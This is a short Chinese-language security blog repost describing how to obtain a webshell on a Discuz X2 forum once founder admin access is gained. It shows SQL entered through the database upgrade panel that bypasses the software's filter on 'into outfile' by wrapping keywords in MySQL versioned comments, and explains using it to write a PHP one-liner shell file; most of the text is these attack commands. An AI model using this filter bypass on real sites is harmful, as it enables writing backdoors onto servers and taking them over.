Discuz X2 后台getshell 鸡肋

admin 2021年4月3日19:26:46评论75 views字数 477阅读1分35秒阅读模式

作者:yesu

最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell

百度无果,自己本地架设了一下

1,当mysql是root时

站长---数据库---升级

尝试

select '1' into outfile 'E:2.txt'

会提示

    [Type] 查询语句安全威胁

    [Query] select '1' into outfile 'E:2.txt'

为什么会这样呢?

configconfig_global.php中

限制了into outfile函数

尝试绕过

/*!select*/ '1' /*!into outfile*/ 'E:3.txt'

Discuz! 数据结构升级成功,影响的记录行数 1

如果要导出一句话,即

/*!select*/ '' /*!into outfile*/ 'E:3.php'

注意:一句话密码不要有引号

摘自:https://www.t00ls.net/viewthread.php?tid=21208

留言评论(旧系统):

佚名 @ 2015-05-30 22:48:54

到底是啥意思啊

本站回复:

-_-!!!

文章来源于lcx.cc:Discuz X2 后台getshell 鸡肋

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:26:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz X2 后台getshell 鸡肋https://cn-sec.com/archives/322547.html

发表评论

匿名网友 填写信息